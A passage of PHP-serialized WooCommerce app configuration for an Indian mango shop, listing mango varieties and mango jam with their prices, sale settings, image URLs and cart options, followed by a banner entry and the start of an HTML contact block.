backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:5;a:47:{s:2:\"id\";i:535;s:4:\"name\";s:7:\"Raspuri\";s:4:\"slug\";s:7:\"raspuri\";s:9:\"permalink\";s:38:\"https://mangomitra.in/product/raspuri/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"170\";s:13:\"regular_price\";s:3:\"170\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹170.00\";s:21:\"regular_price_display\";s:9:\"₹170.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>170.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/08-300x226.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/08-300x226.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:226;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:226;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:6;a:47:{s:2:\"id\";i:542;s:4:\"name\";s:5:\"Kesar\";s:4:\"slug\";s:5:\"kesar\";s:9:\"permalink\";s:36:\"https://mangomitra.in/product/kesar/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"220\";s:13:\"regular_price\";s:3:\"220\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹220.00\";s:21:\"regular_price_display\";s:9:\"₹220.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>220.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-300x224.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/15-300x224.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:224;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:224;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:7;a:47:{s:2:\"id\";i:590;s:4:\"name\";s:8:\"alphonsa\";s:4:\"slug\";s:8:\"alphonsa\";s:9:\"permalink\";s:39:\"https://mangomitra.in/product/alphonsa/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:2:\"80\";s:13:\"regular_price\";s:2:\"80\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:8:\"₹80.00\";s:21:\"regular_price_display\";s:8:\"₹80.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:130:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>80.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:76:\"https://mangomitra.in/wp-content/uploads/woocommerce-placeholder-320x320.png\";}s:9:\"thumbnail\";s:76:\"https://mangomitra.in/wp-content/uploads/woocommerce-placeholder-320x320.png\";s:14:\"thumbnail_meta\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"crop\";i:1;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:3:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"crop\";i:1;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:8;a:47:{s:2:\"id\";i:596;s:4:\"name\";s:4:\"aaaa\";s:4:\"slug\";s:4:\"aaaa\";s:9:\"permalink\";s:35:\"https://mangomitra.in/product/aaaa/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";d:46;s:13:\"regular_price\";s:3:\"100\";s:10:\"sale_price\";d:46;s:13:\"price_display\";s:8:\"₹46.00\";s:21:\"regular_price_display\";s:9:\"₹100.00\";s:18:\"sale_price_display\";s:8:\"₹46.00\";s:10:\"price_html\";s:303:\"<del aria-hidden=\"true\"><span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>100.00</bdi></span></del> <ins><span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>46.00</bdi></span></ins>\";s:7:\"on_sale\";b:1;s:15:\"sale_percentage\";s:3:\"54%\";s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:59:\"https://mangomitra.in/wp-content/uploads/2022/01/images.jpg\";}s:9:\"thumbnail\";s:59:\"https://mangomitra.in/wp-content/uploads/2022/01/images.jpg\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:300;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:9;a:47:{s:2:\"id\";i:536;s:4:\"name\";s:5:\"Pairi\";s:4:\"slug\";s:5:\"pairi\";s:9:\"permalink\";s:36:\"https://mangomitra.in/product/pairi/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"180\";s:13:\"regular_price\";s:3:\"180\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹180.00\";s:21:\"regular_price_display\";s:9:\"₹180.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>180.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/09-300x224.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/09-300x224.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:224;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:224;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:10;a:47:{s:2:\"id\";i:612;s:4:\"name\";s:9:\"mango jam\";s:4:\"slug\";s:9:\"mango-jam\";s:9:\"permalink\";s:40:\"https://mangomitra.in/product/mango-jam/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:2:\"74\";s:13:\"regular_price\";s:2:\"78\";s:10:\"sale_price\";s:2:\"74\";s:13:\"price_display\";s:8:\"₹74.00\";s:21:\"regular_price_display\";s:8:\"₹78.00\";s:18:\"sale_price_display\";s:8:\"₹74.00\";s:10:\"price_html\";s:302:\"<del aria-hidden=\"true\"><span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>78.00</bdi></span></del> <ins><span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>74.00</bdi></span></ins>\";s:7:\"on_sale\";b:1;s:15:\"sale_percentage\";s:2:\"5%\";s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--300x200.webp\";}s:9:\"thumbnail\";s:171:\"https://mangomitra.in/wp-content/uploads/2022/01/79969457-homemade-mango-jam-with-fresh-fruits-and-leaves-of-mango-on-a-white-marble-caramelized-mango-jam-in--300x200.webp\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:200;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:200;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:11;a:47:{s:2:\"id\";i:543;s:4:\"name\";s:6:\"Badami\";s:4:\"slug\";s:6:\"badami\";s:9:\"permalink\";s:37:\"https://mangomitra.in/product/badami/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"220\";s:13:\"regular_price\";s:3:\"220\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹220.00\";s:21:\"regular_price_display\";s:9:\"₹220.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>220.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-300x227.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/16-300x227.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:227;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:227;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:12;a:47:{s:2:\"id\";i:540;s:4:\"name\";s:5:\"Malda\";s:4:\"slug\";s:5:\"malda\";s:9:\"permalink\";s:36:\"https://mangomitra.in/product/malda/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"200\";s:13:\"regular_price\";s:3:\"200\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹200.00\";s:21:\"regular_price_display\";s:9:\"₹200.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>200.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/13-300x226.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/13-300x226.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:226;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:226;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:13;a:47:{s:2:\"id\";i:532;s:4:\"name\";s:12:\"Banginapalli\";s:4:\"slug\";s:12:\"banginapalli\";s:9:\"permalink\";s:43:\"https://mangomitra.in/product/banginapalli/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"140\";s:13:\"regular_price\";s:3:\"140\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹140.00\";s:21:\"regular_price_display\";s:9:\"₹140.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>140.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/05-300x229.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/05-300x229.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:229;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:229;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}i:14;a:47:{s:2:\"id\";i:539;s:4:\"name\";s:7:\"Malgova\";s:4:\"slug\";s:7:\"malgova\";s:9:\"permalink\";s:38:\"https://mangomitra.in/product/malgova/\";s:4:\"type\";s:6:\"simple\";s:8:\"featured\";b:0;s:17:\"short_description\";s:0:\"\";s:3:\"sku\";s:0:\"\";s:8:\"currency\";s:3:\"INR\";s:15:\"currency_symbol\";s:3:\"₹\";s:5:\"price\";s:3:\"200\";s:13:\"regular_price\";s:3:\"200\";s:10:\"sale_price\";s:0:\"\";s:13:\"price_display\";s:9:\"₹200.00\";s:21:\"regular_price_display\";s:9:\"₹200.00\";s:18:\"sale_price_display\";s:7:\"₹0.00\";s:10:\"price_html\";s:131:\"<span class=\"woocommerce-Price-amount amount\"><bdi><span class=\"woocommerce-Price-currencySymbol\">&#8377;</span>200.00</bdi></span>\";s:7:\"on_sale\";b:0;s:15:\"sale_percentage\";b:0;s:11:\"purchasable\";b:1;s:12:\"downloadable\";b:0;s:19:\"display_add_to_cart\";b:1;s:27:\"change_thumbnail_image_size\";b:0;s:18:\"hide_buy_now_block\";b:0;s:14:\"buy_now_action\";a:2:{s:4:\"type\";s:6:\"normal\";s:6:\"params\";a:0:{}}s:19:\"buy_now_button_text\";s:7:\"Buy now\";s:23:\"add_to_cart_button_text\";s:11:\"Add to cart\";s:10:\"qty_config\";a:7:{s:4:\"type\";s:6:\"normal\";s:5:\"label\";s:8:\"Quantity\";s:7:\"display\";b:1;s:11:\"input_value\";s:1:\"1\";s:9:\"max_value\";s:4:\"1000\";s:9:\"min_value\";s:1:\"1\";s:4:\"step\";s:1:\"1\";}s:14:\"stock_quantity\";N;s:8:\"in_stock\";b:1;s:6:\"weight\";s:0:\"\";s:10:\"dimensions\";a:3:{s:6:\"length\";s:0:\"\";s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:15:\"reviews_allowed\";b:1;s:14:\"display_rating\";b:1;s:14:\"average_rating\";s:4:\"0.00\";s:12:\"rating_count\";i:0;s:6:\"images\";a:1:{i:0;s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/12-300x217.png\";}s:9:\"thumbnail\";s:63:\"https://mangomitra.in/wp-content/uploads/2022/01/12-300x217.png\";s:14:\"thumbnail_meta\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:217;}s:11:\"images_meta\";a:1:{i:0;a:2:{s:7:\"caption\";s:0:\"\";s:4:\"size\";a:2:{s:5:\"width\";i:300;s:6:\"height\";i:217;}}}s:16:\"notify_backorder\";b:0;s:22:\"notify_backorder_label\";s:12:\"On backorder\";s:5:\"color\";b:0;s:10:\"attributes\";a:0:{}s:18:\"default_attributes\";a:0:{}s:18:\"product_in_webview\";b:0;s:6:\"labels\";a:0:{}}}s:4:\"meta\";a:3:{s:21:\"show_view_more_button\";b:0;s:22:\"view_more_button_title\";s:9:\"View more\";s:16:\"view_more_action\";a:3:{s:4:\"type\";s:9:\"NO_ACTION\";s:13:\"original_type\";s:9:\"NO_ACTION\";s:6:\"params\";a:1:{s:5:\"value\";s:0:\"\";}}}}i:3;a:4:{s:4:\"type\";s:6:\"banner\";s:5:\"title\";s:0:\"\";s:4:\"data\";a:1:{i:0;a:4:{s:5:\"image\";s:68:\"http://demo.shopilder.com/wp-content/uploads/2019/09/Group-214-1.png\";s:10:\"dimensions\";O:8:\"stdClass\":2:{s:6:\"height\";i:345;s:5:\"width\";i:1080;}s:5:\"title\";s:4:\"Home\";s:6:\"action\";a:2:{s:4:\"type\";s:12:\"LIST_PRODUCT\";s:6:\"params\";a:2:{s:8:\"category\";s:0:\"\";s:5:\"title\";s:0:\"\";}}}}s:4:\"meta\";a:0:{}}i:4;a:4:{s:4:\"type\";s:4:\"html\";s:5:\"title\";s:0:\"\";s:4:\"data\";a:1:{i:0;a:1:{s:4:\"html\";s:117:\"<html><body style=\'padding:10px 30px\'><p><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Contact 